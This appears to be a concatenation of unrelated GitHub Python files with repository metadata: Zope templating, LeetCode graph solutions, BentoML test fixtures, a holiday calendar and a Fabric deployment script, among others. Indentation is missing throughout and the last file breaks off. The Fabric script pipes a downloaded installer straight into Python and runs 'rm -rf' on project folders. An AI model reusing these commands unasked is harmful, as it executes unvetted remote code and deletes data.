def traverse(self, name, further_path):
try:
return self[name]
except KeyError:
raise TraversalError(self, name)
def _Engine(engine=None):
if engine is None:
engine = ZopeEngine()
engine = _create_base_engine(engine, ZopePathExpr)
engine.registerType('python', ZopePythonExpr)
# Using a proxy around sys.modules allows page templates to use
# modules for which security declarations have been made, but
# disallows execution of any import-time code for modules, which
# should not be allowed to happen during rendering.
engine.registerBaseName('modules', ProxyFactory(sys.modules))
return engine
def _TrustedEngine(engine=None):
if engine is None:
engine = TrustedZopeEngine()
engine = _create_base_engine(engine, TrustedZopePathExpr)
engine.registerType('python', PythonExpr)
engine.registerBaseName('modules', TraversableModuleImporter())
return engine
def _create_base_engine(engine, pathtype):
for pt in pathtype._default_type_names:
engine.registerType(pt, pathtype)
engine.registerType('string', StringExpr)
engine.registerType('not', NotExpr)
engine.registerType('defer', DeferExpr)
return engine
Engine = _Engine()
TrustedEngine = _TrustedEngine()
class AppPT(object):
def pt_getEngine(self):
return Engine
class TrustedAppPT(object):
def pt_getEngine(self):
return TrustedEngine
| displacedaussie/gae-zpt | zope/pagetemplate/engine.py | engine.py | py | 14,488 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "zope.traversing.adapters.traversePathElement",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "zope.security.proxy.ProxyFactory",
"line_number": 53,
"usage_type": "argument"
},
{
"api_name": "zope.tales.expressions.PathExpr",
"line_number": 55,
"u... |
41307675140 | '''
https://leetcode.com/problems/minimum-height-trees/description/
'''
from collections import defaultdict, deque
# there can only be at most two roots in MHT, which are the mid points of the longest path
# find leaves, remove leaves from neighbours
# keep doing as long as num of nodes is > 2
# ones remaining are the root
def findMinHeightTrees(n, edges):
"""
:type n: int
:type edges: List[List[int]]
:rtype: List[int]
"""
adjlist = defaultdict(set)
for u,v in edges:
adjlist[u].add(v)
adjlist[v].add(u)
nodes = set(range(n)) # {0, 1, 2, 3}
while len(nodes) > 2:
leaves = {i for i in nodes if len(adjlist[i]) == 1}
nodes -= leaves # remove set of leaves from nodes
for i in leaves:
for edge in adjlist[i]: # moving up one level
adjlist[edge].remove(i)
return list(nodes)
print(findMinHeightTrees(6, [[0, 3], [1, 3], [2, 3], [4, 3], [5, 4]])) # [3, 4]
# runs faster due to one lesser for loop, and no set comprehension
def find_min_height_faster(n, edges):
adjlist = defaultdict(set)
for u,v in edges:
adjlist[u].add(v)
adjlist[v].add(u)
nodes = set(range(n)) # {0, 1, 2, 3}
leaves = {i for i in nodes if len(adjlist[i]) == 1}
while len(nodes) > 2:
newleaves = set()
nodes -= leaves
for i in leaves:
j = adjlist[i].pop()
adjlist[j].remove(i)
print(adjlist)
if len(adjlist[j]) == 1:
newleaves.add(j)
leaves = newleaves
return list(nodes)
# bfs, O(n^2), TLE
# do bfs on each node to find minheight of each node
def findMinHeightTrees(n, edges):
"""
:type n: int
:type edges: List[List[int]]
:rtype: List[int]
"""
adjlist = defaultdict(list)
for u,v in edges:
adjlist[u].append(v)
adjlist[v].append(u)
levels, ans, minheight = {}, [], float('inf')
for i in range(n):
visited, queue = set(), deque([(i, 0)])
level, height = 0, float('-inf')
while queue:
curr, level = queue.popleft()
visited.add(curr)
for edge in adjlist[curr]:
if edge not in visited:
queue.append((edge, level+1))
levels[i] = level
minheight = min(minheight, level)
for key, val in levels.items():
if val == minheight:
ans.append(key)
return ans
print(findMinHeightTrees(4, [[1, 0], [1, 2], [1, 3]])) # [1]
| huiwenhw/interview-prep | leetcode_Python/graph_MinHeightTrees.py | graph_MinHeightTrees.py | py | 2,527 | python | en | code | 22 | github-code | 1 | [
{
"api_name": "collections.defaultdict",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "collections.defaultdict",
"line_number": 64,
"usage_type": "call"
},
{
"api_name"... |
16748849391 | from __future__ import annotations
import os
import typing as t
import logging
import pathlib
from typing import TYPE_CHECKING
import yaml
import pytest
import bentoml
from bentoml._internal.utils import bentoml_cattr
from bentoml._internal.models import ModelStore
from bentoml._internal.models import ModelContext
from bentoml._internal.bento.build_config import BentoBuildConfig
if TYPE_CHECKING:
from _pytest.python import Metafunc
TEST_MODEL_CONTEXT = ModelContext(
framework_name="testing", framework_versions={"testing": "v1"}
)
def pytest_generate_tests(metafunc: Metafunc) -> None:
from bentoml._internal.utils import analytics
analytics.usage_stats.do_not_track.cache_clear()
analytics.usage_stats._usage_event_debugging.cache_clear() # type: ignore (private warning)
# used for local testing, on CI we already set DO_NOT_TRACK
os.environ["__BENTOML_DEBUG_USAGE"] = "False"
os.environ["BENTOML_DO_NOT_TRACK"] = "True"
@pytest.fixture(scope="function")
def noop_service(dummy_model_store: ModelStore) -> bentoml.Service:
import cloudpickle
from bentoml.io import Text
class NoopModel:
def predict(self, data: t.Any) -> t.Any:
return data
with bentoml.models.create(
"noop_model",
context=TEST_MODEL_CONTEXT,
module=__name__,
signatures={"predict": {"batchable": True}},
_model_store=dummy_model_store,
) as model:
with open(model.path_of("test.pkl"), "wb") as f:
cloudpickle.dump(NoopModel(), f)
ref = bentoml.models.get("noop_model", _model_store=dummy_model_store)
class NoopRunnable(bentoml.Runnable):
SUPPORTED_RESOURCES = ("cpu",)
SUPPORTS_CPU_MULTI_THREADING = True
def __init__(self):
self._model: NoopModel = bentoml.picklable_model.load_model(ref)
@bentoml.Runnable.method(batchable=True)
def predict(self, data: t.Any) -> t.Any:
return self._model.predict(data)
svc = bentoml.Service(
name="noop_service",
runners=[bentoml.Runner(NoopRunnable, models=[ref])],
)
@svc.api(input=Text(), output=Text())
def noop_sync(data: str) -> str: # type: ignore
return data
return svc
@pytest.fixture(scope="function", autouse=True, name="propagate_logs")
def fixture_propagate_logs() -> t.Generator[None, None, None]:
logger = logging.getLogger("bentoml")
# bentoml sets propagate to False by default, so we need to set it to True
# for pytest caplog to recognize logs
logger.propagate = True
yield
# restore propagate to False after tests
logger.propagate = False
@pytest.fixture(scope="function")
def reload_directory(
request: pytest.FixtureRequest, tmp_path_factory: pytest.TempPathFactory
) -> t.Generator[pathlib.Path, None, None]:
"""
This fixture will create an example bentoml working file directory
and yield the results directory
./
├── models/ # mock default bentoml home models directory
├── [fdir, fdir_one, fdir_two]/
│ ├── README.md
├── subdir/
│ ├── README.md
│ │ └── app.py
│ ├── somerust.rs
│ └── app.py
├── README.md
├── .bentoignore
├── bentofile.yaml
├── fname.ipynb
├── requirements.txt
├── service.py
└── train.py
"""
root = tmp_path_factory.mktemp("reload_directory")
# create a models directory
root.joinpath("models").mkdir()
# enable this fixture to use with unittest.TestCase
if request.cls is not None:
request.cls.reload_directory = root
root_file = [
"README.md",
"requirements.txt",
"service.py",
"train.py",
"fname.ipynb",
]
for f in root_file:
p = root.joinpath(f)
p.touch()
build_config = BentoBuildConfig(
service="service.py:svc",
description="A mock service",
exclude=["*.rs"],
).with_defaults()
bentofile = root / "bentofile.yaml"
bentofile.touch()
with bentofile.open("w", encoding="utf-8") as f:
yaml.safe_dump(bentoml_cattr.unstructure(build_config), f)
custom_library = ["fdir", "fdir_one", "fdir_two"]
for app in custom_library:
ap = root.joinpath(app)
ap.mkdir()
dir_files: list[tuple[str, list[t.Any]]] = [
("README.md", []),
("subdir", ["README.md", "app.py"]),
("lib.rs", []),
("app.py", []),
]
for name, maybe_files in dir_files:
if maybe_files:
dpath = ap.joinpath(name)
dpath.mkdir()
for f in maybe_files:
p = dpath.joinpath(f)
p.touch()
else:
p = ap.joinpath(name)
p.touch()
yield root
@pytest.fixture(scope="function", name="change_test_dir")
def fixture_change_test_dir(
request: pytest.FixtureRequest,
) -> t.Generator[None, None, None]:
os.chdir(request.fspath.dirname) # type: ignore (bad pytest stubs)
yield
os.chdir(request.config.invocation_dir) # type: ignore (bad pytest stubs)
@pytest.fixture(scope="session", name="dummy_model_store")
def fixture_dummy_model_store(tmpdir_factory: "pytest.TempPathFactory") -> ModelStore:
store = ModelStore(tmpdir_factory.mktemp("models"))
with bentoml.models.create(
"testmodel",
module=__name__,
signatures={},
context=TEST_MODEL_CONTEXT,
_model_store=store,
):
pass
with bentoml.models.create(
"testmodel",
module=__name__,
signatures={},
context=TEST_MODEL_CONTEXT,
_model_store=store,
):
pass
with bentoml.models.create(
"anothermodel",
module=__name__,
signatures={},
context=TEST_MODEL_CONTEXT,
_model_store=store,
):
pass
return store
| almirb/BentoML | tests/conftest.py | conftest.py | py | 6,054 | python | en | code | null | github-code | 1 | [
{
"api_name": "typing.TYPE_CHECKING",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "bentoml._internal.models.ModelContext",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "_pytest.python.Metafunc",
"line_number": 26,
"usage_type": "name"
},
{
... |
71634532833 | import json
import argparse
import shutil
import nbt
import os
def main():
parser = argparse.ArgumentParser(description='修改玩家座標')
parser.add_argument("username", help="Player name", type=str)
parser.add_argument("dim", help="Target dim", type=int)
parser.add_argument("x", help="Target x", type=float)
parser.add_argument("y", help="Target y", type=float)
parser.add_argument("z", help="Target z", type=float)
args = parser.parse_args()
with open('usernamecache.json') as f:
uuid_to_username = json.load(f)
target_uuid = None
for uuid, username in uuid_to_username.items():
if username == args.username:
target_uuid = uuid
print('Player uuid: ' + target_uuid)
filename = os.path.join('world', 'playerdata', target_uuid + '.dat')
shutil.copy(filename, filename + '.bak')
player_dat = nbt.nbt.NBTFile(filename, 'rb')
player_dat['Dimension'].value = args.dim
player_dat['Pos'][0].value = args.x
player_dat['Pos'][1].value = args.y
player_dat['Pos'][2].value = args.z
player_dat.write_file(filename)
print('Done')
if __name__ == '__main__':
main()
| danny50610/MCServerTool | ChangePlayerPos.py | ChangePlayerPos.py | py | 1,179 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_nu... |
15746108853 | # -*- coding: utf-8 -*-
"""
Created on Wed Apr 24 11:26:01 2019
@author: soura
"""
import hashtag
import query
import username
import json
import decider
import pandas as pd
class Transfer:
def __init__(self):
self.file_mapping = {"query":"query_results.json", "username":"username_results.json","hashtag":"hashtag_results.json"}
self.predictor=decider.Decider(mode="test")
def set_mode(self, mode):
self.mode = mode
def fetch_predict(self, data):
filename = self.file_mapping[self.mode]
if self.mode=="query":
query.fetch_queries(data)
elif self.mode=="username":
username.get_tweets(data)
else:
hashtag.get_tweets(data)
data=json.load(open(filename,'r'))
tweets=[]
for obj in data:
tweets.append(obj['tweet'])
predictions=[self.predictor.predict(tweets[i])[0] for i in range(len(tweets))]
return pd.DataFrame({"Tweets":tweets,"Prediction":predictions}) | SaurabhRuikar/TwitterMining | control_transfer.py | control_transfer.py | py | 1,045 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "decider.Decider",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "query.fetch_queries",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "username.get_tweets",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "hashtag.get_t... |
72663761634 | import pandas as pd
import rpy2.robjects.packages as rpackages
from rpy2.robjects.vectors import StrVector
import xlsxwriter
def add_feature_metadata(df_target, df_feature_metadata, df_target_fn_col=None):
"""Adds feature metadata columns to df_target.
Args:
df_target - a DataFrame; must contain feature names somewhere
df_feature_metadata - a DataFrame containing feature metadata,
as loaded by fst.py's self.feature_metadata
df_target_fn_col - the name of the column in df_target that contains
the feature names, or None if it's the index of df_target that
contains the feature names
Returns:
a copy of df_target with the feature metadata added
"""
original_index = df_target.index
if df_target_fn_col is not None:
df_target.index = df_target[df_target_fn_col]
df_joined = df_target.join(df_feature_metadata)
# add groups for shadow features
s_group = df_joined['group']
feature_names = s_group.index.values
s_non_shadows = pd.Series(
[not fname.startswith('shadow_') for fname in feature_names],
index=feature_names)
s_group = s_group.where(s_non_shadows, 'Shadow')
df_joined['group'] = s_group
# handle any remaining NaN groups
df_joined['group'].fillna('NA')
# restore index
df_target.index = original_index
return df_joined
def create_refuse_xlsx(df_refuse_table, df_feature_metadata, outpath):
"""Creates an Excel spreadsheet containing the REFUSE Table data,
annotated with the feature metadata, saved to the given outpath."""
# merge data
df_complete = add_feature_metadata(df_refuse_table, df_feature_metadata)
df_complete['Feature Name'] = df_complete.index.values # easier to iterate
# sort by VIM_mean
df_complete.sort(columns='VIM_mean', ascending=False, inplace=True)
# create spreadsheet
workbook = xlsxwriter.Workbook(outpath)
worksheet = workbook.add_worksheet()
# start from first cell (zero-indexed)
row = 0
col = 0
# styles
title_style = workbook.add_format({
'font_size': 12,
'font_color': 'white',
'bg_color': '#808080'
})
relevant_style = workbook.add_format({
'font_size': 12,
'bg_color': '#EBF1DE'
})
default_style = workbook.add_format({
'font_size': 12})
# these columns should always come first
column_order = ['Feature Name', 'VIM_mean', 'p_val', 'VIM_var', 'group']
# there may be user-defined columns to follow
additional_columns = [x for x in df_complete.columns.values
if x not in column_order]
# final order
column_order += additional_columns
# some columns get user-friendly names
column_titles = {
'VIM_mean': 'Rank (higher=better)',
'p_val': 'Likelihood of Relevance',
'VIM_var': 'Variance of Rank',
'group': 'Group Name'}
for column in column_order:
row = 0
title = column
if column in column_titles:
title = column_titles[column]
worksheet.write(row, col, title, title_style)
for cell in df_complete[column]:
row += 1
style = default_style
if column == 'p_val' and cell > 0.5:
style = relevant_style
worksheet.write(row, col, cell, style)
col += 1
# set column widths
worksheet.set_column(0, len(column_order)-1, 30)
workbook.close()
def check_r_packages():
"""Ensures required R packages are installed."""
# import R's utility package
utils = rpackages.importr('utils')
# R package names
packnames = ('classInt',
'minerva', # should already be installed in dockerfile
'randomForest', #should already be installed in dockerfile
#'ggplot2', #used by FST commands that generate PDFs, which aren't currently
# #used, and this package doesn't install properly due to versioning problems
'MASS',
'gplots')
# R vector of strings
for x in packnames:
print('$$$ ensuring installation of R package: ' + str(x))
if rpackages.isinstalled(x):
print('$$$ already installed')
else:
print('$$$ INSTALLING: ' + x)
utils.install_packages(StrVector([x]), verbose=True, quiet=False, dependencies=True, repos="https://cran.rstudio.com", method="curl")
print('$$$ reported as now installed? ' + str(rpackages.isinstalled(x)) + ' for ' + x)
#R likes to fail silently, so double check.
failed_installs = list()
for x in packnames:
if not rpackages.isinstalled(x):
failed_installs.append(x)
if not len(failed_installs) == 0:
raise Exception('rpackages claims to have installed these packages, but did not: ' + str(failed_installs))
| KnowEnG/platform | nest_py/lib_src/fst_pipeline/fst_utils.py | fst_utils.py | py | 4,881 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "pandas.Series",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "xlsxwriter.Workbook",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "rpy2.robjects.packages.importr",
"line_number": 108,
"usage_type": "call"
},
{
"api_name": "rpy... |
26292649193 | """Management of per-player info."""
from functools import partial
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QIntValidator, QPalette, QColor
from PyQt5.QtWidgets import (
QFormLayout,
QGroupBox,
QGridLayout,
QHBoxLayout,
QLabel,
QLineEdit,
QPushButton,
QWidget,
)
from table.scorer import Phase, dress_value
class Player(QGroupBox):
"""A widget for managing player info."""
def __init__(self, name, dress_cb, drop_cb):
"""Initialise with name and a callback for board dressing."""
super().__init__(name)
self.name = name
self.setAlignment(Qt.AlignCenter)
layout = QFormLayout()
self.count = QLabel("")
layout.addRow("Count:", self.count)
self.cards = QLineEdit()
self.cards.setValidator(QIntValidator())
layout.addRow("Cards:", self.cards)
self.dress = QPushButton("Dress")
self.dress.clicked.connect(partial(dress_cb, self))
self.drop = QPushButton("Go Out")
self.drop.clicked.connect(partial(drop_cb, self))
self.drop.hide()
buttons = QHBoxLayout()
buttons.addWidget(self.dress)
buttons.addWidget(self.drop)
layout.setLayout(2, QFormLayout.SpanningRole, buttons)
self.setLayout(layout)
def set_color(self, color):
"""Set the color palette."""
for button in (self.dress, self.drop):
col = QColor(color)
if not button.isEnabled():
col.setAlpha(150)
pal = button.palette()
pal.setColor(self.backgroundRole(), col)
pal.setColor(QPalette.ButtonText, col.darker())
button.setPalette(pal)
def set_bold_italic(self, bold_italic):
"""Set whether the font should be both bold and italic or not."""
font = self.font()
font.setBold(bold_italic)
font.setItalic(bold_italic)
self.setFont(font)
def refresh(self, phase, is_in_game, is_dresser, balance):
"""Refresh the widget based on the game state."""
# Update player scores
self.count.setText(str(balance))
# Clear card counts
self.cards.setText("")
# Deduce other flags
must_dress = is_dresser and (phase == Phase.DRESSING)
cannot_dress = balance < dress_value()
out_of_counters = (must_dress and cannot_dress) or (balance < 0)
# Update widget availability based on the game state
self.setEnabled(is_in_game)
self.cards.setEnabled(phase == Phase.SCORING)
self.dress.setEnabled(must_dress)
self.drop.setEnabled(out_of_counters)
if out_of_counters:
self.drop.show()
else:
self.drop.hide()
# Update colour based on game state
if not is_in_game:
self.set_color(Qt.lightGray)
elif out_of_counters:
self.set_color(Qt.red)
elif cannot_dress:
self.set_color(Qt.yellow)
elif must_dress:
self.set_color(Qt.green)
else:
self.set_color(Qt.darkGray)
# Update font based on whether the player is the dresser
self.set_bold_italic(is_dresser)
@property
def cards_left(self):
"""Get the number of cards remaining."""
try:
return int(self.cards.text())
except ValueError:
return 0
class PlayerPanel(QWidget):
"""A panel of widgets for managing player info."""
N_ROWS = 4
def __init__(self, players, dress_cb, drop_cb):
"""Initialise from a list of names and board dressing callback."""
super().__init__()
layout = QGridLayout()
self.players = {}
for i, name in enumerate(players):
player = Player(name, dress_cb, drop_cb)
self.players[name] = player
row = 2 * (i % self.N_ROWS)
col = (i // self.N_ROWS)
layout.addWidget(player, row, col)
layout.setRowStretch(row + 1, 1)
self.setLayout(layout)
def __getitem__(self, key):
"""Return the requested player widget."""
return self.players[key]
def __iter__(self):
"""Return iterator through player widgets."""
return iter(self.players.values())
def refresh(self, phase, players, dresser, balance):
"""Refresh the player score displays based on the game state."""
for name, player in self.players.items():
player.refresh(phase,
name in players,
name == dresser,
balance[name])
| martinblake/pope-joan | table/player.py | player.py | py | 4,657 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "PyQt5.QtWidgets.QGroupBox",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "PyQt5.QtCore.Qt.AlignCenter",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "PyQt5.QtCore.Qt",
"line_number": 27,
"usage_type": "name"
},
{
"api_na... |
13025816665 | import glob
import cv2
import pandas as pd
import openpyxl
from openpyxl.utils.dataframe import dataframe_to_rows
from skimage.metrics import structural_similarity as ssim
import os
import sys
def SearchExtFiles(fpath, ext, lst):
try:
flist = os.listdir(fpath)
except:
return
for f in flist:
next = os.path.join(fpath, f)
if(os.path.splitext(next)[-1] == ext):
lst.append(next)
if os.path.isdir(next):
SearchExtFiles(next,ext,lst)
# 열 너비 자동 맞춤
def AutoFitColumnSize(worksheet, columns=None, margin=2):
for i, column_cells in enumerate(worksheet.columns):
is_ok = False
if columns == None:
is_ok = True
elif isinstance(columns, list) and i in columns:
is_ok = True
if is_ok:
length = max(len(str(cell.value)) for cell in column_cells)
worksheet.column_dimensions[column_cells[0].column_letter].width = length + margin
def image_compare():
# 통합 문서 객체 생성
wb = openpyxl.Workbook()
# 시트 선택
ws = wb.active
ws.append(['index', 'Similarity', 'different image'])
refLst = []
SearchExtFiles(sys.argv[1],'.bmp',refLst) # main 있는 자리에 이미지가 있으면 경로 지정할 때 ./ 으로 놓기 (경로는 edit_Configuration 에서 parameter 바꾸기)
compLst = []
SearchExtFiles(sys.argv[2],'.bmp', compLst)
# 파일 전체 읽기 위해 glob 함수 사용
ref_img_list = refLst
compare_img_list = compLst
for i in range(len(ref_img_list)):
imageA = cv2.imread(ref_img_list[i])
imageB = cv2.imread(compare_img_list[i])
imageC = imageA.copy()
if (ref_img_list[i] == compare_img_list[i]):
tempDiff = cv2.subtract(imageA, imageB)
grayA = cv2.cvtColor(imageA, cv2.COLOR_BGR2GRAY)
grayB = cv2.cvtColor(imageB, cv2.COLOR_BGR2GRAY)
(score, diff) = ssim(grayA, grayB, full=True)
diff = (diff * 255).astype("uint8")
print(f"Similarity: {score:.5f}")
if (score == 1):
print("같음")
# 다를 땐 엑셀로 이미지 파일 이름 뽑기
else:
diff_image = ref_img_list[i]
print(diff_image)
df = pd.DataFrame([[score, diff_image]], index=[ws.max_row/2+0.5], columns=['Similarity', 'different image'])
# df = pd.DataFrame([[score, diff_image]])
# 시트에 데이터프레임 삽입
for r in dataframe_to_rows(df, index=True, header=False): # True 면 변경 가능 False면 변경 불가능
ws.append(r)
print("다름")
# assert 함수는 디버깅 모드에서 개발자가 오류가 생기면 치명적일 것이라는 곳에 심어 놓는 에러 검출용 코드
assert score, "다른 점 찾을 수 없음"
df = df.reset_index(inplace=True)
AutoFitColumnSize(ws)
# df.index=df.index+1
# 엑셀 파일에 저장
wb.save("./test.xlsx")
# 아무 키나 눌러서 종료하기
cv2.waitKey(0)
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
image_compare()
| siszero/TIL | Python/main.py | main.py | py | 3,313 | python | ko | code | 0 | github-code | 1 | [
{
"api_name": "os.listdir",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "os.path.splitext",
"line_num... |
14109182065 | # -*- coding: utf-8 -*-
# python-holidays
# ---------------
# A fast, efficient Python library for generating country, province and state
# specific sets of holidays on the fly. It aims to make determining whether a
# specific date is a holiday as fast and flexible as possible.
#
# Author: ryanss <ryanssdev@icloud.com> (c) 2014-2017
# dr-prodigy <maurizio.montel@gmail.com> (c) 2017-2020
# Website: https://github.com/dr-prodigy/python-holidays
# License: MIT (see LICENSE file)
from datetime import date
from dateutil.easter import easter
from dateutil.relativedelta import relativedelta as rd, TH, FR, SA, SU
from holidays.constants import JAN, FEB, MAR, APR, MAY, SEP, OCT, \
DEC
from holidays.holiday_base import HolidayBase
class Honduras(HolidayBase):
# https://www.timeanddate.com/holidays/honduras/
def __init__(self, **kwargs):
self.country = "HND"
HolidayBase.__init__(self, **kwargs)
def _populate(self, year):
# New Year's Day
if self.observed and date(year, JAN, 1):
self[date(year, JAN, 1)] = "Año Nuevo [New Year's Day]"
# The Three Wise Men Day
if self.observed and date(year, JAN, 6):
name = "Día de los Reyes Magos [The Three Wise Men Day] (Observed)"
self[date(year, JAN, 6)] = name
# The Three Wise Men Day
if self.observed and date(year, FEB, 3):
name = "Día de la virgen de Suyapa [Our Lady of Suyapa] (Observed)"
self[date(year, FEB, 3)] = name
# The Father's Day
if self.observed and date(year, MAR, 19):
name = "Día del Padre [Father's Day] (Observed)"
self[date(year, MAR, 19)] = name
# Maundy Thursday
self[easter(year) + rd(weekday=TH(-1))
] = "Jueves Santo [Maundy Thursday]"
# Good Friday
self[easter(year) + rd(weekday=FR(-1))
] = "Viernes Santo [Good Friday]"
# Holy Saturday
self[easter(year) + rd(weekday=SA(-1))
] = "Sábado de Gloria [Holy Saturday]"
# Easter Sunday
self[easter(year) + rd(weekday=SU(-1))
] = "Domingo de Resurrección [Easter Sunday]"
# America Day
if self.observed and date(year, APR, 14):
self[date(year, APR, 14)] = "Día de las Américas [America Day]"
# Labor Day
if self.observed and date(year, MAY, 1):
self[date(year, MAY, 1)] = "Día del Trabajo [Labour Day]"
# Mother's Day
may_first = date(int(year), 5, 1)
weekday_seq = may_first.weekday()
mom_day = (14 - weekday_seq)
if self.observed and date(year, MAY, mom_day):
str_day = "Día de la madre [Mother's Day] (Observed)"
self[date(year, MAY, mom_day)] = str_day
# Children's Day
if self.observed and date(year, SEP, 10):
name = "Día del niño [Children day] (Observed)"
self[date(year, SEP, 10)] = name
# Independence Day
if self.observed and date(year, SEP, 15):
name = "Día de la Independencia [Independence Day]"
self[date(year, SEP, 15)] = name
# Teacher's Day
if self.observed and date(year, SEP, 17):
name = "Día del Maestro [Teacher's day] (Observed)"
self[date(year, SEP, 17)] = name
# October Holidays are joined on 3 days starting at October 3 to 6.
# Some companies work medium day and take the rest on saturday.
# This holiday is variant and some companies work normally.
# If start day is weekend is ignored.
# The main objective of this is to increase the tourism.
# https://www.hondurastips.hn/2017/09/20/de-donde-nace-el-feriado-morazanico/
if year <= 2014:
# Morazan's Day
if self.observed and date(year, OCT, 3):
self[date(year, OCT, 3)] = "Día de Morazán [Morazan's Day]"
# Columbus Day
if self.observed and date(year, OCT, 12):
self[date(year, OCT, 12)] = "Día de la Raza [Columbus Day]"
# Amy Day
if self.observed and date(year, OCT, 21):
str_day = "Día de las Fuerzas Armadas [Army Day]"
self[date(year, OCT, 21)] = str_day
else:
# Morazan Weekend
if self.observed and date(year, OCT, 3):
name = "Semana Morazánica [Morazan Weekend]"
self[date(year, OCT, 3)] = name
# Morazan Weekend
if self.observed and date(year, OCT, 4):
name = "Semana Morazánica [Morazan Weekend]"
self[date(year, OCT, 4)] = name
# Morazan Weekend
if self.observed and date(year, OCT, 5):
name = "Semana Morazánica [Morazan Weekend]"
self[date(year, OCT, 5)] = name
# Christmas
self[date(year, DEC, 25)] = "Navidad [Christmas]"
class HN(Honduras):
pass
class HND(Honduras):
pass
| jose-dom/bitcoin_forecasting | env/lib/python3.9/site-packages/holidays/countries/honduras.py | honduras.py | py | 5,085 | python | en | code | 10 | github-code | 1 | [
{
"api_name": "holidays.holiday_base.HolidayBase",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "holidays.holiday_base.HolidayBase.__init__",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "holidays.holiday_base.HolidayBase",
"line_number": 29,
"usag... |
20539164384 | # EDITOR > File and Code Templates put this here!
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
x=np.linspace(-10,10,100)
y=x**2
#%%
plt.close('all')
plt.ion()
plt.style.use('seaborn') # style sheet reference: https://matplotlib.org/3.1.0/gallery/style_sheets/style_sheets_reference.html
fig, ax = plt.subplots( 1,1)#, figsize=(12,9), sharex=False) #W x H
#fig = matplotlib.pyplot.figure
plt.plot(x,y, color='orange', linestyle='-')
# Do this, then get autocomplete pop-ups on plt
assert isinstance(ax, matplotlib.axes._subplots.Subplot)
# ax.
#%%
| OSHI7/Learning1 | TestAutoComplete.py | TestAutoComplete.py | py | 581 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.linspace",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.close",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "matplotlib.py... |
13225320697 | from __future__ import annotations
import configparser
import datetime
import os
import typing
import fabric
import invocations.console
import invoke
import invoke_patch
import src.constants
class GlobalConfig:
host: str
user: str
key_filename: str
project_name: str
project_path: str
source_filenames = [
'main.py',
'database.py',
'utils.py',
'telegram_utils.py',
'analytics.py',
'constants.py',
'custom_logger.py',
'config.cfg'
]
meta_filenames = [
'pyproject.toml',
'poetry.lock'
]
source_directories = [
'migrations'
]
@classmethod
def load(cls) -> None:
try:
fabfile_config = configparser.ConfigParser()
fabfile_config.read('fabfile.cfg')
cls.host = fabfile_config.get('Fabric', 'Host')
cls.user = fabfile_config.get('Fabric', 'User')
cls.key_filename = os.path.expanduser(fabfile_config.get('Fabric', 'KeyFilename'))
cls.project_name = fabfile_config.get('Fabric', 'ProjectName')
cls.project_path = fabfile_config.get('Fabric', 'ProjectPath')
except configparser.Error as error:
raise invoke.Exit(
message=f'Config error: {error}',
code=1
)
invoke_patch.fix_annotations()
GlobalConfig.load()
@fabric.task
def configure(connection: fabric.Connection) -> None:
connection.user = GlobalConfig.user
connection.inline_ssh_env = True
connection.connect_kwargs.key_filename = GlobalConfig.key_filename
@fabric.task(pre=[configure], hosts=[GlobalConfig.host], help={'command': 'The shell command to execute on the server', 'env': 'An optional dictionary with environment variables'})
def execute(connection: fabric.Connection, command: str, env: typing.Dict[str, str] = None) -> None:
if not command:
return
connection.run(command, env=env)
@fabric.task(pre=[configure], hosts=[GlobalConfig.host])
def cleanup(connection: fabric.Connection) -> None:
question = f'Are you sure you want to completely delete the project "{GlobalConfig.project_name}" from "{GlobalConfig.host}"?'
if invocations.console.confirm(
question=question,
assume_yes=False
):
execute(connection, f'rm -rf {GlobalConfig.project_name}')
execute(connection, f'rm -rf {GlobalConfig.project_path}/{GlobalConfig.project_name}')
@fabric.task(pre=[configure, cleanup], hosts=[GlobalConfig.host])
def setup(connection: fabric.Connection) -> None:
execute(connection, f'mkdir -p {GlobalConfig.project_path}/{GlobalConfig.project_name}')
execute(connection, f'ln -s {GlobalConfig.project_path}/{GlobalConfig.project_name} {GlobalConfig.project_name}')
execute(connection, 'curl -sSL https://install.python-poetry.org | python -')
@fabric.task(pre=[configure], hosts=[GlobalConfig.host], help={'filename': 'An optional filename to deploy to the server'})
def upload(connection: fabric.Connection, filename: typing.Optional[str] = None) -> None:
def upload_file(file_format: str, file_name: str, destination_path_format='{.project_name}/{}') -> None:
connection.put(file_format.format(file_name), destination_path_format.format(GlobalConfig, file_name))
def upload_directory(directory_name: str) -> None:
execute(connection, f'mkdir -p {GlobalConfig.project_name}/{directory_name}')
for _root, _directories, files in os.walk(f'src/{directory_name}'):
for file in files:
upload_file(f'src/{directory_name}/{{}}', file, f'{{.project_name}}/{directory_name}/{{}}')
if filename:
if filename in GlobalConfig.source_directories:
upload_directory(filename)
else:
if filename in GlobalConfig.source_filenames:
file_path_format = 'src/{}'
elif filename in GlobalConfig.meta_filenames:
file_path_format = '{}'
else:
